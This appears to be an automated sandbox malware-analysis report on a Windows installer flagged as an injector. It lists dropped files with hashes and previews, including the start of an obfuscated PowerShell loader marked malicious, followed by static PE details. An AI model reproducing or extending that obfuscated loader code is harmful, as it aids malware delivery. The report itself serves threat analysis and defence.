                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...'.uY.................d...*......=3............@.................................7/....@..........................................................................................................................................................text...mb.......d.................. ..`.rdata...............h..............@..@.data................|..............@....ndata...................................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\Vaccinerende.exe:Zone.Identifier

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:ggPYV:rPYV
                                          MD5:187F488E27DB4AF347237FE461A079AD
                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                          Malicious:true
                                          Preview:[ZoneTransfer]....ZoneId=0

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gdteyhmj.s2h.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_idym0olg.jbk.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rzzrjaju.32h.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xsqnp4wm.tuq.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\bhv4DB0.tmp

                                          Download File
                                          Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x6eec0579, page size 32768, DirtyShutdown, Windows version 10.0
                                          Category:dropped
                                          Size (bytes):15728640
                                          Entropy (8bit):0.10805027086476268
                                          Encrypted:false
                                          SSDEEP:1536:+SB2jpSB2jFSjlK/Qw/ZweshzbOlqVqmesAzbIBl73esleszO/Z4zbU/L:+a6aOUueqVRIBYvOU
                                          MD5:9F6FBA8CABF6D4ECDD5B285F375D352B
                                          SHA1:ED0D370573441F24C1FEF0F1D7A92DB58AA484D8
                                          SHA-256:4C764E2DF9F41B915772A2259A958DB29E6476693225882D1FBAE286C22AFB41
                                          SHA-512:75C78BF6271DBDFE3A044ADF75F84AF49867E63BD614F0A300A676A73A736432C16C2DA686177B01E01BE6018178CCD060FB009DA012AD876BFD632833046A0C
                                          Malicious:false
                                          Preview:n..y... ...................':...{........................Z.....9....{S......{w.h.\.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{...................................H......{w.................2.G......{w..........................#......h.\.....................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\bhv64C2.tmp

                                          Download File
                                          Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x6eec0579, page size 32768, DirtyShutdown, Windows version 10.0
                                          Category:dropped
                                          Size (bytes):15728640
                                          Entropy (8bit):0.10805027086476268
                                          Encrypted:false
                                          SSDEEP:1536:+SB2jpSB2jFSjlK/Qw/ZweshzbOlqVqmesAzbIBl73esleszO/Z4zbU/L:+a6aOUueqVRIBYvOU
                                          MD5:9F6FBA8CABF6D4ECDD5B285F375D352B
                                          SHA1:ED0D370573441F24C1FEF0F1D7A92DB58AA484D8
                                          SHA-256:4C764E2DF9F41B915772A2259A958DB29E6476693225882D1FBAE286C22AFB41
                                          SHA-512:75C78BF6271DBDFE3A044ADF75F84AF49867E63BD614F0A300A676A73A736432C16C2DA686177B01E01BE6018178CCD060FB009DA012AD876BFD632833046A0C
                                          Malicious:false
                                          Preview:n..y... ...................':...{........................Z.....9....{S......{w.h.\.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{...................................H......{w.................2.G......{w..........................#......h.\.....................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\dpvrcfd

                                          Download File
                                          Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                          Category:dropped
                                          Size (bytes):2
                                          Entropy (8bit):1.0
                                          Encrypted:false
                                          SSDEEP:3:Qn:Qn
                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                          Malicious:false
                                          Preview:..

                                          C:\Users\user\AppData\Local\Temp\lkcwddclh

                                          Download File
                                          Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                          Category:dropped
                                          Size (bytes):2
                                          Entropy (8bit):1.0
                                          Encrypted:false
                                          SSDEEP:3:Qn:Qn
                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                          Malicious:false
                                          Preview:..

                                          C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res

                                          Download File
                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe
                                          File Type:ASCII text, with very long lines (3095), with CRLF, LF line terminators
                                          Category:dropped
                                          Size (bytes):53853
                                          Entropy (8bit):5.3041850938045645
                                          Encrypted:false
                                          SSDEEP:1536:Yb2DFjNKjwJJCwZuTEaiwLAm7C24yWjc2:YSrvJEwZtwM6qg2
                                          MD5:552ED0904239D64DB1895620B38DC799
                                          SHA1:8A6A6C6EFD31B04C716CDE1783B45783F2843E20
                                          SHA-256:D4D98FDBE306D61986BED62340744554E0A288C5A804ED5C924F66885CBF3514
                                          SHA-512:21F283AC39223437470036EC08EB01BF40C4A0C45EA5B94BB4D902CF66923DB4D14641CE68370D240AB2B213527552DFDE13EB1FF4B21A0BBF0C1EE6AED7ADE7
                                          Malicious:true
                                          Preview:$Overofficered=$Messingflaskers;..<#Skridende Voldgifternes Holdet Kharijite himmerigsmundfuld Paraphernalian Overtallets #>..<#Sprngsikreste Farvebilleder Presentation cervix Throughcome #>..<#Monepiscopal Lnrelation Unresponsibly Dekompressionsventil Xerographer Outset #>..<#Ligbrnding Ligustrenes Snedkereres Sarkasmernes Transformism Gennembladet Attackable #>..<#Altertavlens Arsenets Indeks #>..<#Reconciliative Pimpet Efteraarene Saxonic Thornton Chumpish Reservistens #>...$Bygmestres = @'.Woyaw.Promi$ CalidTreleiR,gioaM.sogl store KartkMetabtJ gtloPetrol regeo upeg aioc= Sque$ artinKendse illau Pi,trAnx oaMe.lsdReoxi;ud ty.Noncof.eathu Shikn,runkc V umtDistri,aghjoParadn O.ga MiraS xploa dornmStr tmSidewePol.dnTapethsi,mefRetrit,nergePeramrYo.im Skos(ghoul$ PaasV.aturiFollosTelefeGen er Nethe Ekstd ugeneTematsMekan, Resu$.isefPPresyoHotpllGdnineSinkem murro WintnPol oiUgleruAnomamBefor)Parag ri sw{Resho.Shoya.Tnkem$PropoOKammep Ru kvA chskSeneskSylloeMindstVivis1Carri4vandd9Str

                                          C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet\brkops.ind

                                          Download File
                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):385193
                                          Entropy (8bit):1.2513468259126719
                                          Encrypted:false
                                          SSDEEP:768:aEMZI3FIfIoASNikk5oeF4qQ7kjt8IrwghWyIgttkVVaxtWJjwHwUZJLPS/UpQFs:4IM85MQZxPWpILCm58b9QeiKhsRR7U
                                          MD5:C73A822A5DC42DEF82529419505D4D34
                                          SHA1:2F09CC0773FD145E60C4C20F9B8085624D0960A6
                                          SHA-256:99EECD9B8808E7B171AE3B9E08B1EFE75CBA0BAFDE4ECF1D240A2BA1F28EC637
                                          SHA-512:C6AAE8D60B43A7D7D1C287F70D91B35E914B0B4C53449B34D3E9D773C7909395755D9266FC4BA88648BC4E94614E550877D1DF54CB7547274D3EEA35ECFAA910
                                          Malicious:false
                                          Preview:........].........................................................$.....$.........................................................................................(..........................................................9..........................s...............................................................................................................................................................................A............................................................~................................F...B........s.....................................X...?.....................M.......................I..................................................................................................SJ............3.K.......M.........................................................................................................................................................7....._.................................E............................................K..................

                                          C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet\dumrians.und

                                          Download File
                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):413966
                                          Entropy (8bit):1.2545701143598162
                                          Encrypted:false
                                          SSDEEP:1536:b2T3E/ySYfBk8nalEPTUh6Va4fPKCPdsqNQj:ij9fBk8alsUhH8js6c
                                          MD5:2563D98DE6469D9979963EFD8D66736D
                                          SHA1:4D98E68617BE777AB97514BDF59CA98AA1102C5F
                                          SHA-256:B7423FE1148A2EA0E5BDE3855DFAB272400202AD01A2402F76E6E5F7DD5E0AE5
                                          SHA-512:C3FDB8870482B6C1A08A3088ED4539746E4F5DFAF63C8AD5F7B7873D2F3FC4FE8945493888422C487F5DB1E216A289A431890E6100A1A10C4ED6BCB2DD8CBBA4
                                          Malicious:false
                                          Preview:.....c.........../..............................u.....................................................................................h......2...............................................*...l...........................;.....................n......a......................I...........................x.;...............................................................................................................................................M....................._...............................................................+...c.....;.j........................................2.........................................................I......................................o..........d.........A.....4.....................r..........................p...........................................................T........................................................................L.......................................................G.............................,.....................

                                          C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Tribades.vir

                                          Download File
                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):257970
                                          Entropy (8bit):1.256808441775652
                                          Encrypted:false
                                          SSDEEP:1536:KcEgmiyf7PGBgwWjC81son6i0q8s0If3y:WDLGoB0q8K3
                                          MD5:9F966EC38C037968BA52C7C6A58EAED1
                                          SHA1:31BC370E88A2A10950D4C3AE24C28DF7E2D89868
                                          SHA-256:B4B70294B142D598F5E391EE8D371014C4AEFA8272754CE0094A8F802ADFA1DA
                                          SHA-512:6DE9F14B990B44336B01DF665F6D1C46B6076C10F1CC40D45DAA009110D9BA51E871599422E486E7264FE251EC560E9922CB959DAE6C6B12CC8B6AF6D720C581
                                          Malicious:false
                                          Preview:..|.....K.............................................................................................{...................................................(......................A............M......................(........W...t..............e............................................................<.....................................................................s.............................................................................................................................L.............................B............/............................................................../..............................w..[......................_.............................................................................T.............o.(....%.........................................n.........J.....................................E.....=...............................................................B......................................y...................................k....

                                          C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Ukr.txt

                                          Download File
                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe
                                          File Type:ASCII text, with very long lines (359), with no line terminators
                                          Category:dropped
                                          Size (bytes):359
                                          Entropy (8bit):4.308814426836422
                                          Encrypted:false
                                          SSDEEP:6:BSX8gnAA04KQeCVNcTKwLD3YAP7bqJINNQUmAdlvKRScZRIOrSeNRRAAefDPJzMA:wdAAMAszL8vJaNFmO0RSGDHRCNYR02yR
                                          MD5:2F193BC3BEEF5356ACF62CB12C2C4EF8
                                          SHA1:6E868DFB3D7ACB1D2C56E0EFA292CD7CF0DEC661
                                          SHA-256:10F1E86374C489E6FFC58B8213423687440ADDC3E483F5C84BE1F34D5DA23754
                                          SHA-512:4D5A2B7BD1C9A034A9A481BAA6C6D5D530AF5B3F95C8B1028C4DAB96FFA6199071E30CF1EB462B790AC845AA8BEAE34A0800741FBAC10242A3F38904593200EB
                                          Malicious:false
                                          Preview:succesforfattere homogamous monkeyishly funktionsstarts phylactolaemata.sextodecimos danmarkspremiere marrietta ancience.brisks grippelike hulebeboere flovmnds retrterne,roxbury marmorgulvets apogamic delprogrammers pips,selvglad polyhistorian flunkeyish deklasserings gidjee regnskabsinformationens,plasma anstandsdamernes pompejansk afmnstre afstbningernes,

                                          C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Valvulate.Cru

                                          Download File
                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):358391
                                          Entropy (8bit):7.608272187839353
                                          Encrypted:false
                                          SSDEEP:6144:6sUrRFXb4UwLDUxrycWgPzYnSH5F5vMu9wSvgzp3EWEFAWZS67RzFEQDnaV9m:TUFyiecWgP8SZrkuC9d3EWEmU+c29m
                                          MD5:14C1D52F24F29389597B36DCFC90B95A
                                          SHA1:A2578253F17B5F0EF989965DCB74AEBB60763B2D
                                          SHA-256:F9B744D0223EFE3C01C94D526881A95523C2F5E457F03774DD1D661944E60852
                                          SHA-512:4DDE50C0B37E51B944A7A61866730E53E96773E28C35260DCAE1EB38805251C3BA8E72C5D33AE2CB8D7486A4D3C6C180EC4560E3C20A6C535CA3A70AAC158710
                                          Malicious:false
                                          Preview:............z.ZZZ....00000............................z.66.....%%%%%%%.........1....)).............................H......'..fff...*......................^.FFF...H.11.6..,......................................................D..UUUUU...rrrr............ .............>>..[.....:::::...m.......ll..............,,,,,.....__....|....S....................."".............A....22.L...I.....44.\\.............ee......&.........................[[[[........dd...h.||||................................TT..............77..z.f.f....[..........|...KK.......................$.......................!.......JJJ...........................S...............................R...""........D..........C.{.....N..dddd..==.....22.........A...........y.z.............U..**..''...............................G...S..........'..PP....MMMMMM......i.....22..........\......]...........j...............A...##...\.0........................................}.............ll........9999......................<.f...........)..........Q

                                          C:\Windows\brandbombernes.lnk

                                          Download File
                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe
                                          File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                          Category:dropped
                                          Size (bytes):1200
                                          Entropy (8bit):3.1112375460820725
                                          Encrypted:false
                                          SSDEEP:12:8wl0OsXowAOcQ/tz+7RafgKDI/OuV4lI/GP+RKQ1AAB0oRKMJEbWl5y6p+uy/3Ny:8VLDaRMgKRZS/l9aG7r8WLJwV9HAvqy
                                          MD5:3EAD1E4300B5A3436DC9731166AB522E
                                          SHA1:C771A15FCA04CD65F15D93F7490CD3A08F03A5BA
                                          SHA-256:DB764385D61F89ECC0A66779958F3338784CF22472CF19EC708EEFB88ADC5857
                                          SHA-512:9B3F818EDE92BE004F23BCDF2FC6C95379930381C4FBC486608356B4CC7132F49C1930A20FA61697107ED53B0E833E025D2B92AA07015736C1C2FAC44DD66BDD
                                          Malicious:false
                                          Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....N.1...........Temp..:............................................T.e.m.p.....b.1...........nsmE387.tmp.H............................................n.s.m.E.3.8.7...t.m.p.....\.2...........cueca.Stu.D............................................c.u.e.c.a...S.t.u.......7.....\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.n.s.m.E.3.8.7...t.m.p.\.c.u.e.c.a...S.t.u.S.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.i.n.t.e.r.c.e.s.s.i.o.n.a.t.e.\.F.a.v.o.u.r.a.b.l.i.e.s.1.1.7.\.s.u.l.f.o.n.y.l.u.r.e.a.\.P.l.a.y.l.e.t..

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Entropy (8bit):6.298838855552093
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe
                                          File size:990'768 bytes
                                          MD5:450228d72f9f726b645c55bbbc6db905
                                          SHA1:b26075c51a4681f2ff7407188f5e9480545a7aca
                                          SHA256:9124d7696d2b94e7959933c3f7a8f68e61a5ce29cd5934a4d0379c2193b126be
                                          SHA512:4795d090447d237cbe1a044ffe78e8cd0c9be358df778673b4713eab2c324056a7701d22b827b95b2413845089fa71ac81a4f47cc8bcdbabad34845e64b4e090
                                          SSDEEP:12288:5Ly0W0exb+S7/6eALmQXhts30QmskXnnAEkINz3WSVgl:5Ly05wCmQXw30Ek3AgNz3Sl
                                          TLSH:8B25F06931B4B1C9E486D6351BC0A329A1B4BD783A43925EF3507FFF767C64AAE00742
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...'.uY.................d...*.....

                                          File Icon

                                          Icon Hash:71ec71330f4c2a18

                                          Static PE Info

                                          General

                                          Entrypoint:0x40333d
                                          Entrypoint Section:.text
                                          Digitally signed:true
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x59759527 [Mon Jul 24 06:35:19 2017 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:b34f154ec913d2d2c435cbd644e91687

                                          Authenticode Signature

                                          Signature Valid:false
                                          Signature Issuer:CN="Thereat Relativitetsteoris ", E=Cerement@Orthron.Sj, L=Stutton, S=England, C=GB
                                          Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                          Error Number:-2146762487
                                          Not Before, Not After
                                          • 06/12/2023 07:24:20 05/12/2026 07:24:20
                                          Subject Chain
                                          • CN="Thereat Relativitetsteoris ", E=Cerement@Orthron.Sj, L=Stutton, S=England, C=GB
                                          Version:3
                                          Thumbprint MD5:CF61656CE4135F82DC50FE57878C334B
                                          Thumbprint SHA-1:E0554B29143002CC0960A94B86DC2BF6918F135E
                                          Thumbprint SHA-256:F21576A3441DE192EFE7335AC36241CA1116B0F66FD80AF2E989CBF8ADF4D9E9
                                          Serial:456E11F23B48550691D0A2F4700B9A60C597D834

                                          Entrypoint Preview

                                          Instruction
                                          sub esp, 000002D4h
                                          push ebx
                                          push esi
                                          push edi
                                          push 00000020h
                                          pop edi
                                          xor ebx, ebx
                                          push 00008001h
                                          mov dword ptr [esp+14h], ebx
                                          mov dword ptr [esp+10h], 0040A2E0h
                                          mov dword ptr [esp+1Ch], ebx
                                          call dword ptr [004080A8h]
                                          call dword ptr [004080A4h]
                                          and eax, BFFFFFFFh
                                          cmp ax, 00000006h
                                          mov dword ptr [0042A20Ch], eax
                                          je 00007FDB20E7B493h
                                          push ebx
                                          call 00007FDB20E7E729h
                                          cmp eax, ebx
                                          je 00007FDB20E7B489h
                                          push 00000C00h
                                          call eax
                                          mov esi, 004082B0h
                                          push esi
                                          call 00007FDB20E7E6A3h
                                          push esi
                                          call dword ptr [00408150h]
                                          lea esi, dword ptr [esi+eax+01h]
                                          cmp byte ptr [esi], 00000000h
                                          jne 00007FDB20E7B46Ch
                                          push 0000000Ah
                                          call 00007FDB20E7E6FCh
                                          push 00000008h
                                          call 00007FDB20E7E6F5h
                                          push 00000006h
                                          mov dword ptr [0042A204h], eax
                                          call 00007FDB20E7E6E9h
                                          cmp eax, ebx
                                          je 00007FDB20E7B491h
                                          push 0000001Eh
                                          call eax
                                          test eax, eax
                                          je 00007FDB20E7B489h
                                          or byte ptr [0042A20Fh], 00000040h
                                          push ebp
                                          call dword ptr [00408044h]
                                          push ebx
                                          call dword ptr [004082A0h]
                                          mov dword ptr [0042A2D8h], eax
                                          push ebx
                                          lea eax, dword ptr [esp+34h]
                                          push 000002B4h
                                          push eax
                                          push ebx
                                          push 004216A8h
                                          call dword ptr [00408188h]
                                          push 0040A2C8h

                                          Rich Headers

                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x5c0000x6c2d0.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0xf14980x998
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x626d0x6400b2dd5d917f94d75528a11411abe5681cFalse0.6569921875data6.423132440637118IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rdata0x80000x138e0x14002914bac53cd4485c9822093463e4eea6False0.4509765625data5.146454805063938IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0xa0000x203180x600c46c24ddc9bf88a6774bd207204164b9False0.4921875data3.906531854842304IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .ndata0x2b0000x310000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .rsrc0x5c0000x6c2d00x6c4004f3d39c7e86d8cf2186d2c5dc01043a3False0.22987559540993072data3.0219143577609104IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_ICON0x5c4780x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.18922167648016097
                                          RT_ICON0x9e4a00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.24856559801253994
                                          RT_ICON0xaecc80x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.29340971200336347
                                          RT_ICON0xb81700x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.31090573012939005
                                          RT_ICON0xbd5f80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.30196032120925836
                                          RT_ICON0xc18200x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.3432572614107884
                                          RT_ICON0xc3dc80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.36843339587242024
                                          RT_ICON0xc4e700xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.4906716417910448
                                          RT_ICON0xc5d180x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.6137184115523465
                                          RT_ICON0xc65c00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.3
                                          RT_ICON0xc6c280x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.3764450867052023
                                          RT_ICON0xc71900x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.4920212765957447
                                          RT_ICON0xc75f80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.3897849462365591
                                          RT_ICON0xc78e00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5135135135135135
                                          RT_DIALOG0xc7a080x100dataEnglishUnited States0.5234375
                                          RT_DIALOG0xc7b080x11cdataEnglishUnited States0.6056338028169014
                                          RT_DIALOG0xc7c280xc4dataEnglishUnited States0.5918367346938775
                                          RT_DIALOG0xc7cf00x60dataEnglishUnited States0.7291666666666666
                                          RT_GROUP_ICON0xc7d500xcadataEnglishUnited States0.6237623762376238
                                          RT_VERSION0xc7e200x16cdataEnglishUnited States0.5769230769230769
